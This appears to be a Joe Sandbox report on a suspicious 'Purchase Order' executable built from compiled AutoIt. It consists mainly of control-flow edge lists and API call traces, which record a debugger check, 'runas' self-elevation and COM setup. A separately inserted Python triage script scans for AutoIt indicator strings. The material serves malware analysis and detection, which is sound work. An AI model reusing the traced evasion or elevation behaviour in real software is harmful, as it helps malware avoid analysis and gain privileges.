87367->87355 87368->87099 87369->87102 87370->87102 87372 414a12 87371->87372 87373 41d8d2 87371->87373 87372->87363 87373->87372 87374 413748 _free 46 API calls 87373->87374 87374->87372 87376 41d80a _raise 87375->87376 87377 41d812 87376->87377 87379 41d82d 87376->87379 87415 417f8a 46 API calls __getptd_noexit 87377->87415 87380 41d839 87379->87380 87383 41d873 87379->87383 87417 417f8a 46 API calls __getptd_noexit 87380->87417 87381 41d817 87416 417f77 46 API calls __getptd_noexit 87381->87416 87387 41ae56 ___lock_fhandle 48 API calls 87383->87387 87385 41d83e 87418 417f77 46 API calls __getptd_noexit 87385->87418 87389 41d879 87387->87389 87388 41d846 87419 417f25 10 API calls __mbstowcs_l_helper 87388->87419 87391 41d893 87389->87391 87392 41d887 87389->87392 87420 417f77 46 API calls __getptd_noexit 87391->87420 87400 41d762 87392->87400 87393 41d81f _raise 87393->87366 87396 41d88d 87421 41d8ba RtlLeaveCriticalSection __unlock_fhandle 87396->87421 87398->87358 87399->87355 87422 41aded 87400->87422 87402 41d7c8 87435 41ad67 47 API calls 2 library calls 87402->87435 87404 41d772 87404->87402 87405 41d7a6 87404->87405 87408 41aded __lseeki64_nolock 46 API calls 87404->87408 87405->87402 87406 41aded __lseeki64_nolock 46 API calls 87405->87406 87409 41d7b2 CloseHandle 87406->87409 87407 41d7d0 87414 41d7f2 87407->87414 87436 417f9d 46 API calls 3 library calls 87407->87436 87410 41d79d 87408->87410 87409->87402 87412 41d7be GetLastError 87409->87412 87411 41aded __lseeki64_nolock 46 API calls 87410->87411 87411->87405 87412->87402 87414->87396 87415->87381 87416->87393 87417->87385 87418->87388 87419->87393 87420->87396 87421->87393 87423 41ae12 87422->87423 87424 41adfa 87422->87424 87426 417f8a __close 46 API calls 87423->87426 87429 41ae51 87423->87429 87425 417f8a __close 46 API calls 87424->87425 87427 41adff 87425->87427 87428 41ae23 87426->87428 87430 417f77 __mbstowcs_l_helper 46 API calls 87427->87430 87431 417f77 __mbstowcs_l_helper 46 API calls 
87428->87431 87429->87404 87434 41ae07 87430->87434 87432 41ae2b 87431->87432 87433 417f25 __mbstowcs_l_helper 10 API calls 87432->87433 87433->87434 87434->87404 87435->87407 87436->87414 87438 414c82 _raise 87437->87438 87439 414cbb _raise 87438->87439 87440 414cc3 87438->87440 87441 414c96 setSBCS 87438->87441 87439->87108 87442 415471 __lock_file 47 API calls 87440->87442 87464 417f77 46 API calls __getptd_noexit 87441->87464 87443 414ccb 87442->87443 87450 414aba 87443->87450 87446 414cb0 87465 417f25 10 API calls __mbstowcs_l_helper 87446->87465 87454 414ad8 setSBCS 87450->87454 87456 414af2 87450->87456 87451 414ae2 87517 417f77 46 API calls __getptd_noexit 87451->87517 87453 414ae7 87518 417f25 10 API calls __mbstowcs_l_helper 87453->87518 87454->87451 87454->87456 87459 414b2d 87454->87459 87466 414cfa RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 87456->87466 87458 414c38 setSBCS 87520 417f77 46 API calls __getptd_noexit 87458->87520 87459->87456 87459->87458 87460 414139 _fprintf 46 API calls 87459->87460 87467 41dfcc 87459->87467 87497 41d8f3 87459->87497 87519 41e0c2 46 API calls 3 library calls 87459->87519 87460->87459 87464->87446 87465->87439 87466->87439 87468 41dfd8 _raise 87467->87468 87469 41dfe0 87468->87469 87470 41dffb 87468->87470 87590 417f8a 46 API calls __getptd_noexit 87469->87590 87472 41e007 87470->87472 87475 41e041 87470->87475 87592 417f8a 46 API calls __getptd_noexit 87472->87592 87473 41dfe5 87591 417f77 46 API calls __getptd_noexit 87473->87591 87478 41e063 87475->87478 87479 41e04e 87475->87479 87477 41e00c 87593 417f77 46 API calls __getptd_noexit 87477->87593 87483 41ae56 ___lock_fhandle 48 API calls 87478->87483 87595 417f8a 46 API calls __getptd_noexit 87479->87595 87481 41e014 87594 417f25 10 API calls __mbstowcs_l_helper 87481->87594 87485 41e069 87483->87485 87484 41e053 87596 417f77 46 API calls __getptd_noexit 87484->87596 87489 41e077 87485->87489 87490 41e08b 87485->87490 87488 41dfed _raise 87488->87459 
87521 41da15 87489->87521 87597 417f77 46 API calls __getptd_noexit 87490->87597 87493 41e083 87599 41e0ba RtlLeaveCriticalSection __unlock_fhandle 87493->87599 87494 41e090 87598 417f8a 46 API calls __getptd_noexit 87494->87598 87498 41d900 87497->87498 87501 41d915 87497->87501 87603 417f77 46 API calls __getptd_noexit 87498->87603 87500 41d905 87604 417f25 10 API calls __mbstowcs_l_helper 87500->87604 87503 41d94a 87501->87503 87511 41d910 87501->87511 87600 420603 87501->87600 87505 414139 _fprintf 46 API calls 87503->87505 87506 41d95e 87505->87506 87507 41dfcc __read 59 API calls 87506->87507 87508 41d965 87507->87508 87509 414139 _fprintf 46 API calls 87508->87509 87508->87511 87510 41d988 87509->87510 87510->87511 87512 414139 _fprintf 46 API calls 87510->87512 87511->87459 87513 41d994 87512->87513 87513->87511 87514 414139 _fprintf 46 API calls 87513->87514 87515 41d9a1 87514->87515 87516 414139 _fprintf 46 API calls 87515->87516 87516->87511 87517->87453 87518->87456 87519->87459 87520->87453 87522 41da31 87521->87522 87523 41da4c 87521->87523 87525 417f8a __close 46 API calls 87522->87525 87524 41da5b 87523->87524 87526 41da7a 87523->87526 87527 417f8a __close 46 API calls 87524->87527 87528 41da36 87525->87528 87530 41da98 87526->87530 87539 41daac 87526->87539 87529 41da60 87527->87529 87531 417f77 __mbstowcs_l_helper 46 API calls 87528->87531 87534 417f77 __mbstowcs_l_helper 46 API calls 87529->87534 87535 417f8a __close 46 API calls 87530->87535 87532 41da3e 87531->87532 87532->87493 87533 41db02 87537 417f8a __close 46 API calls 87533->87537 87536 41da67 87534->87536 87538 41da9d 87535->87538 87540 417f25 __mbstowcs_l_helper 10 API calls 87536->87540 87541 41db07 87537->87541 87542 417f77 __mbstowcs_l_helper 46 API calls 87538->87542 87539->87532 87539->87533 87545 41dae1 87539->87545 87547 41db1b 87539->87547 87540->87532 87543 417f77 __mbstowcs_l_helper 46 API calls 87541->87543 87544 41daa4 87542->87544 87543->87544 87546 417f25 
__mbstowcs_l_helper 10 API calls 87544->87546 87545->87533 87550 41daec ReadFile 87545->87550 87546->87532 87549 416b04 __malloc_crt 46 API calls 87547->87549 87551 41db31 87549->87551 87552 41dc17 87550->87552 87553 41df8f GetLastError 87550->87553 87556 41db59 87551->87556 87557 41db3b 87551->87557 87552->87553 87560 41dc2b 87552->87560 87554 41de16 87553->87554 87555 41df9c 87553->87555 87564 417f9d __dosmaperr 46 API calls 87554->87564 87569 41dd9b 87554->87569 87558 417f77 __mbstowcs_l_helper 46 API calls 87555->87558 87561 420494 __lseeki64_nolock 48 API calls 87556->87561 87559 417f77 __mbstowcs_l_helper 46 API calls 87557->87559 87562 41dfa1 87558->87562 87563 41db40 87559->87563 87560->87569 87570 41dc47 87560->87570 87573 41de5b 87560->87573 87565 41db67 87561->87565 87566 417f8a __close 46 API calls 87562->87566 87567 417f8a __close 46 API calls 87563->87567 87564->87569 87565->87550 87566->87569 87567->87532 87568 413748 _free 46 API calls 87568->87532 87569->87532 87569->87568 87571 41dcab ReadFile 87570->87571 87578 41dd28 87570->87578 87576 41dcc9 GetLastError 87571->87576 87581 41dcd3 87571->87581 87572 41ded0 ReadFile 87574 41deef GetLastError 87572->87574 87582 41def9 87572->87582 87573->87569 87573->87572 87574->87573 87574->87582 87575 41ddec MultiByteToWideChar 87575->87569 87577 41de10 GetLastError 87575->87577 87576->87570 87576->87581 87577->87554 87578->87569 87579 41dda3 87578->87579 87580 41dd96 87578->87580 87586 41dd60 87578->87586 87579->87586 87587 41ddda 87579->87587 87583 417f77 __mbstowcs_l_helper 46 API calls 87580->87583 87581->87570 87584 420494 __lseeki64_nolock 48 API calls 87581->87584 87582->87573 87585 420494 __lseeki64_nolock 48 API calls 87582->87585 87583->87569 87584->87581 87585->87582 87586->87575 87588 420494 __lseeki64_nolock 48 API calls 87587->87588 87589 41dde9 87588->87589 87589->87575 87590->87473 87591->87488 87592->87477 87593->87481 87594->87488 87595->87484 87596->87481 87597->87494 87598->87493 
87599->87488 87601 416b04 __malloc_crt 46 API calls 87600->87601 87602 420618 87601->87602 87602->87503 87603->87500 87604->87511 87608 4148b3 GetSystemTimeAsFileTime __aulldiv 87605->87608 87607 442c6b 87607->87111 87608->87607 87609->87118 87610->87122 87611->87122 87617 45272f __tzset_nolock _wcscpy 87612->87617 87613 44afef GetSystemTimeAsFileTime 87613->87617 87614 414d04 61 API calls __fread_nolock 87614->87617 87615 4528a4 87615->87032 87615->87033 87616 4150d1 81 API calls _fseek 87616->87617 87617->87613 87617->87614 87617->87615 87617->87616 87619 44b1bc 87618->87619 87620 44b1ca 87618->87620 87621 4149c2 116 API calls 87619->87621 87622 44b1e1 87620->87622 87623 4149c2 116 API calls 87620->87623 87624 44b1d8 87620->87624 87621->87620 87653 4321a4 87622->87653 87625 44b2db 87623->87625 87624->87060 87625->87622 87627 44b2e9 87625->87627 87631 44b2f6 87627->87631 87633 414a46 __fcloseall 82 API calls 87627->87633 87628 44b224 87629 44b253 87628->87629 87630 44b228 87628->87630 87657 43213d 87629->87657 87632 44b235 87630->87632 87635 414a46 __fcloseall 82 API calls 87630->87635 87631->87060 87636 44b245 87632->87636 87638 414a46 __fcloseall 82 API calls 87632->87638 87633->87631 87635->87632 87636->87060 87637 44b25a 87639 44b260 87637->87639 87640 44b289 87637->87640 87638->87636 87642 44b26d 87639->87642 87645 414a46 __fcloseall 82 API calls 87639->87645 87667 44b0bf 87 API calls 87640->87667 87643 44b27d 87642->87643 87646 414a46 __fcloseall 82 API calls 87642->87646 87643->87060 87644 44b28f 87668 4320f8 46 API calls _free 87644->87668 87645->87642 87646->87643 87648 44b295 87649 414a46 __fcloseall 82 API calls 87648->87649 87651 44b2a2 87648->87651 87649->87651 87650 44b2b2 87650->87060 87651->87650 87652 414a46 __fcloseall 82 API calls 87651->87652 87652->87650 87654 4321cb 87653->87654 87656 4321b4 __tzset_nolock _memmove 87653->87656 87655 414d04 __fread_nolock 61 API calls 87654->87655 87655->87656 87656->87628 87658 4135bb _malloc 46 API calls 
87657->87658 87659 432150 87658->87659 87660 4135bb _malloc 46 API calls 87659->87660 87661 432162 87660->87661 87662 4135bb _malloc 46 API calls 87661->87662 87663 432174 87662->87663 87665 432189 87663->87665 87669 4320f8 46 API calls _free 87663->87669 87665->87637 87666 432198 87666->87637 87667->87644 87668->87648 87669->87666 87670->86963 87671->86965 87672->86983 87673->86983 87674->86983 87675->86977 87676->86983 87677->86983 87678->86988 87679->86997 87680->86995 87681->86995 87731 410160 87682->87731 87684 41012f GetFullPathNameW 87685 410147 ctype 87684->87685 87685->86820 87687 4102cb SHGetDesktopFolder 87686->87687 87688 410333 _wcsncpy 87686->87688 87687->87688 87689 4102e0 _wcsncpy 87687->87689 87688->86823 87689->87688 87690 41031c SHGetPathFromIDListW 87689->87690 87690->87688 87692 4101bb 87691->87692 87696 425f4a 87691->87696 87693 410160 52 API calls 87692->87693 87695 4101c7 87693->87695 87694 4114ab __wcsicoll 58 API calls 87694->87696 87735 410200 52 API calls 2 library calls 87695->87735 87696->87694 87700 425f6e 87696->87700 87698 4101d6 87736 410200 52 API calls 2 library calls 87698->87736 87700->86825 87701 4101e9 87701->86825 87703 40f760 128 API calls 87702->87703 87704 40f584 87703->87704 87705 429335 87704->87705 87706 40f58c 87704->87706 87709 4528bd 118 API calls 87705->87709 87707 40f598 87706->87707 87708 429358 87706->87708 87754 4033c0 113 API calls 7 library calls 87707->87754 87755 434034 86 API calls _wprintf 87708->87755 87712 42934b 87709->87712 87715 429373 87712->87715 87716 42934f 87712->87716 87713 429369 87713->87715 87714 40f5b4 87714->86821 87717 4115d7 52 API calls 87715->87717 87718 431e58 82 API calls 87716->87718 87730 4293c5 ctype 87717->87730 87718->87708 87719 42959c 87720 413748 _free 46 API calls 87719->87720 87721 4295a5 87720->87721 87722 431e58 82 API calls 87721->87722 87723 4295b1 87722->87723 87727 401b10 52 API calls 87727->87730 87730->87719 87730->87727 87737 444af8 87730->87737 87740 402780 
87730->87740 87748 4022d0 87730->87748 87756 44c7dd 64 API calls 3 library calls 87730->87756 87757 44b41c 52 API calls 87730->87757 87732 410167 _wcslen 87731->87732 87733 4115d7 52 API calls 87732->87733 87734 41017e _wcscpy 87733->87734 87734->87684 87735->87698 87736->87701 87738 4115d7 52 API calls 87737->87738 87739 444b27 _memmove 87738->87739 87739->87730 87742 402827 87740->87742 87747 402790 ctype _memmove 87740->87747 87741 4115d7 52 API calls 87744 402797 87741->87744 87743 4115d7 52 API calls 87742->87743 87743->87747 87745 4115d7 52 API calls 87744->87745 87746 4027bd 87744->87746 87745->87746 87746->87730 87747->87741 87749 4022e0 87748->87749 87751 40239d 87748->87751 87750 4115d7 52 API calls 87749->87750 87749->87751 87752 402320 ctype 87749->87752 87750->87752 87751->87730 87752->87751 87753 4115d7 52 API calls 87752->87753 87753->87752 87754->87714 87755->87713 87756->87730 87757->87730 87759 402417 87758->87759 87760 402539 ctype 87758->87760 87759->87760 87761 4115d7 52 API calls 87759->87761 87760->86829 87762 402443 87761->87762 87763 4115d7 52 API calls 87762->87763 87764 4024b4 87763->87764 87764->87760 87766 4022d0 52 API calls 87764->87766 87787 402880 95 API calls 2 library calls 87764->87787 87766->87764 87771 401566 87767->87771 87768 401794 87788 40e9a0 90 API calls 87768->87788 87771->87768 87772 40167a 87771->87772 87773 4010a0 52 API calls 87771->87773 87774 4017c0 87772->87774 87789 45e737 90 API calls 3 library calls 87772->87789 87773->87771 87774->86831 87776 40bc70 52 API calls 87775->87776 87785 40d451 87776->87785 87777 40d50f 87792 410600 52 API calls 87777->87792 87779 427c01 87793 45e737 90 API calls 3 library calls 87779->87793 87780 40e0a0 52 API calls 87780->87785 87782 401b10 52 API calls 87782->87785 87783 40d519 87783->86834 87785->87777 87785->87779 87785->87780 87785->87782 87785->87783 87790 40f310 53 API calls 87785->87790 87791 40d860 91 API calls 87785->87791 87787->87764 87788->87772 87789->87774 
87790->87785 87791->87785 87792->87783 87793->87783 87794->86848 87795->86847 87797 42c5fe 87796->87797 87812 4091c6 87796->87812 87798 40bc70 52 API calls 87797->87798 87797->87812 87799 42c64e InterlockedIncrement 87798->87799 87800 42c665 87799->87800 87806 42c697 87799->87806 87802 42c672 InterlockedDecrement Sleep InterlockedIncrement 87800->87802 87800->87806 87801 42c737 InterlockedDecrement 87803 42c74a 87801->87803 87802->87800 87802->87806 87805 408f40 VariantClear 87803->87805 87804 42c731 87804->87801 87807 42c752 87805->87807 87806->87801 87806->87804 88089 408e80 87806->88089 88102 410c60 87807->88102 87812->86908 87813 42c6db 87814 402160 52 API calls 87813->87814 87815 42c6e5 87814->87815 87816 45340c 85 API calls 87815->87816 87817 42c6f1 87816->87817 88099 40d200 52 API calls 2 library calls 87817->88099 87819 42c6fb 88100 465124 53 API calls 87819->88100 87821 42c715 87822 42c76a 87821->87822 87823 42c719 87821->87823 87824 401b10 52 API calls 87822->87824 88101 46fe32 VariantClear 87823->88101 87826 42c77e 87824->87826 87827 401980 53 API calls 87826->87827 87833 42c796 87827->87833 87828 42c812 88113 46fe32 VariantClear 87828->88113 87830 42c82a InterlockedDecrement 88114 46ff07 54 API calls 87830->88114 87832 42c864 88115 45e737 90 API calls 3 library calls 87832->88115 87833->87828 87833->87832 88107 40ba10 87833->88107 87834 42c9ec 87840 401980 53 API calls 87850 42c849 87840->87850 87841 408f40 VariantClear 87841->87850 87844 408f40 VariantClear 87847 42c891 87844->87847 87845 402780 52 API calls 87845->87850 87849 410c60 VariantClear 87847->87849 87849->87812 87850->87834 87850->87840 87850->87841 87850->87845 88116 40a780 87850->88116 87851 42c874 87851->87844 87853 42ca59 87851->87853 87853->87853 87855 40afc4 87854->87855 87856 40b156 87854->87856 87857 40afd5 87855->87857 87858 42d1e3 87855->87858 88172 45e737 90 API calls 3 library calls 87856->88172 87863 40a780 199 API calls 87857->87863 87874 40b11a ctype 87857->87874 88173 45e737 
90 API calls 3 library calls 87858->88173 87861 42d1f8 87867 408f40 VariantClear 87861->87867 87862 40b143 87862->86908 87865 40b00a 87863->87865 87865->87861 87868 40b012 87865->87868 87866 42d4db 87866->87866 87867->87862 87869 42d231 VariantClear 87868->87869 87870 40b04a 87868->87870 87878 40b094 ctype 87868->87878 87879 40b05c ctype 87869->87879 87870->87879 88174 40e270 VariantClear ctype 87870->88174 87871 42d45a VariantClear 87871->87874 87872 40b108 87872->87874 88175 40e270 VariantClear ctype 87872->88175 87874->87862 88176 45e737 90 API calls 3 library calls 87874->88176 87875 4115d7 52 API calls 87875->87878 87877 42d425 ctype 87877->87871 87877->87874 87878->87872 87878->87877 87879->87875 87879->87878 87881 408fff 87880->87881 87883 40900d 87880->87883 88223 403ea0 52 API calls __cinit 87881->88223 87885 42c3f6 87883->87885 87887 42c44a 87883->87887 87888 40a780 199 API calls 87883->87888 87889 42c47b 87883->87889 87893 42c4cb 87883->87893 87894 42c564 87883->87894 87898 42c548 87883->87898 87900 409112 87883->87900 87901 4090df 87883->87901 87903 42c528 87883->87903 87905 4090ea 87883->87905 87914 4090f2 ctype 87883->87914 88225 4534e3 52 API calls 87883->88225 88227 40c4e0 199 API calls 87883->88227 88226 45e737 90 API calls 3 library calls 87885->88226 88228 45e737 90 API calls 3 library calls 87887->88228 87888->87883 88229 451b42 61 API calls 87889->88229 88177 47faae 87893->88177 87895 408f40 VariantClear 87894->87895 87895->87914 87896 42c491 87896->87914 88230 45e737 90 API calls 3 library calls 87896->88230 88233 45e737 90 API calls 3 library calls 87898->88233 87899 42c4da 87899->87914 88231 45e737 90 API calls 3 library calls 87899->88231 87900->87898 87908 40912b 87900->87908 87901->87905 87906 408e80 VariantClear 87901->87906 88232 45e737 90 API calls 3 library calls 87903->88232 87910 408f40 VariantClear 87905->87910 87906->87905 87908->87914 88224 403e10 53 API calls 87908->88224 87910->87914 87912 40914b 87913 408f40 VariantClear 
[Control-flow graph edge list, continued; rendered as a graph image in the original report. The node labels in this portion reference the Windows APIs TranslateAcceleratorW, IsDialogMessageW, GetClassLongW, CharUpperBuffW, VariantInit, VariantCopy, VariantClear, SysFreeString, lstrcmpiW, OleInitialize, CLSIDFromProgID, GetVersionExW, GetCurrentProcess, GetSystemInfo, GetNativeSystemInfo, LoadLibraryA, GetProcAddress, FreeLibrary, GetStdHandle, CreateThread, CloseHandle, RegOpenKeyExW, RegQueryValueExW and RegCloseKey, plus the CRT helpers _wcslen, _memmove, __wcsicoll, __itow_s and __cinit.]
                                  APIs
                                  • _wcslen.LIBCMT ref: 004096C1
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • _memmove.LIBCMT ref: 0040970C
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                  • _memmove.LIBCMT ref: 00409D96
                                  • _memmove.LIBCMT ref: 0040A6C4
                                  • _memmove.LIBCMT ref: 004297E5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                  • String ID:
                                  • API String ID: 2383988440-0
                                  • Opcode ID: 6ff525b2c59c7c054ff9d2bd3b1975f8866825bf581303900bce7b5d9fa65f40
                                  • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                  • Opcode Fuzzy Hash: 6ff525b2c59c7c054ff9d2bd3b1975f8866825bf581303900bce7b5d9fa65f40
                                  • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

                                  Control-flow Graph

                                  APIs
                                  • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                    • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe,00000104,?), ref: 00401F4C
                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                    • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                  • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                  • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                    • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                  • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                  • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                  • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                    • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                    • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                    • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                    • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                    • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                    • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                    • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                    • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                    • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                    • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                    • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                    • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                  • String ID: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                  • API String ID: 2495805114-3452472325
                                  • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                  • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                  • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                  • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
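The API list above records the AutoIt3 runtime's startup path as the sandbox saw it: an IsDebuggerPresent check, the "This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support." MessageBoxA text, and a ShellExecuteW re-launch of the sample with the "runas" verb, which produces a UAC elevation prompt. The script below is an added example, not part of the Joe Sandbox report and not AutoIt or FormBook code. It scans a file image for those two runtime strings and for the AU3!EA06 compiled-script marker; the marker bytes are an assumption taken from common AutoIt unpacking tools, not something this report lists. The sample buffer it runs on is constructed.

```python
"""
Static triage for suspected compiled-AutoIt droppers (added example, not Joe
Sandbox or AutoIt code). Three indicators are searched for: the AutoIt3
runtime's "compiled script" message box text and the UTF-16 "runas" verb
(both visible in the report's API list), plus the AutoIt3 compiled-script
marker, which is an assumption from AutoIt unpacking tools, not from the report.
"""
import sys

AUTOIT_MSGBOX = (b"This is a compiled AutoIt script. AV researchers please email "
                 b"avsupport@autoitscript.com for support.")
# ShellExecuteW takes wide strings, so the verb sits in the binary as UTF-16LE.
RUNAS_W = "runas".encode("utf-16-le")
# Assumed AutoIt3 compiled-script marker (16 magic bytes + ASCII "AU3!EA06"),
# as documented by AutoIt unpacking tools; not confirmed by this report.
AU3_MAGIC = bytes.fromhex("A3484BBE986C4AA9994C530A86D6487D") + b"AU3!EA06"

INDICATORS = {
    "autoit_runtime_msgbox": AUTOIT_MSGBOX,
    "autoit_script_marker": AU3_MAGIC,
    "shellexecute_runas_verb": RUNAS_W,
}


def find_all(data: bytes, needle: bytes) -> list:
    """Every offset at which `needle` occurs in `data` (non-overlapping)."""
    offsets, pos = [], data.find(needle)
    while pos != -1:
        offsets.append(pos)
        pos = data.find(needle, pos + len(needle))
    return offsets


def triage(data: bytes) -> dict:
    """Map each indicator name to the list of offsets where it was found."""
    return {name: find_all(data, needle) for name, needle in INDICATORS.items()}


def verdict(hits: dict) -> str:
    """Collapse the hits into a triage label.

    'compiled-autoit' needs the runtime message text or the script marker.
    The runas verb on its own is weak (any program that elevates through UAC
    carries it), so it only upgrades an existing AutoIt hit.
    """
    is_autoit = bool(hits["autoit_runtime_msgbox"] or hits["autoit_script_marker"])
    if not is_autoit:
        return "no-autoit-indicators"
    if hits["shellexecute_runas_verb"]:
        return "compiled-autoit+self-elevation"
    return "compiled-autoit"


# Constructed stand-in for a PE image: padding around the three markers so the
# example runs offline. Real use: triage(open(path, "rb").read()).
SAMPLE_IMAGE = (b"MZ" + b"\x00" * 510 + AUTOIT_MSGBOX + b"\x00" * 64
                + RUNAS_W + b"\x00" * 32 + AU3_MAGIC + b"\x00" * 16)


def main(paths):
    for p in paths:
        with open(p, "rb") as f:
            hits = triage(f.read())
        print(p, verdict(hits), {k: [hex(o) for o in v] for k, v in hits.items()})


if __name__ == "__main__":
    if len(sys.argv) > 1:
        main(sys.argv[1:])
    else:
        hits = triage(SAMPLE_IMAGE)
        print("constructed sample:", verdict(hits), hits)
```

Run it as `python triage.py sample.exe`; without arguments it reports on the constructed buffer. Offsets are returned rather than booleans so a hit can be cross-checked against the report's string references (the MessageBoxA text is referenced at 0042E1C9 in the listing above).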

                                  Control-flow Graph

                                  [Control-flow graph of the function at 0046CB5F (COM object activation), rendered as an image in the original report. The entry block 46cb5f-46cbc3 optionally calls OleInitialize (46cbc5) and then resolves the class with CLSIDFromProgID (46cbd4), falling back to CLSIDFromString (46cbe9); a resolution failure goes to the cleanup block 46cc06. Block 46cc33 then branches either to a plain CoCreateInstance (46cc49) or to the path through CoInitializeSecurity (46ccbc), CoCreateInstanceEx and CoTaskMemFree (46cdfa-46ce4a) and CoSetProxyBlanket (46ce64-46ce8b). A failed activation reaches the error block at 46cea4, whose string reference is "NULL Pointer assignment", before the common cleanup at 46cc06.]
                                  APIs
                                  • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                  • CLSIDFromProgID.COMBASE(?,?), ref: 0046CBDF
                                  • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                  • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                  • _wcslen.LIBCMT ref: 0046CDB0
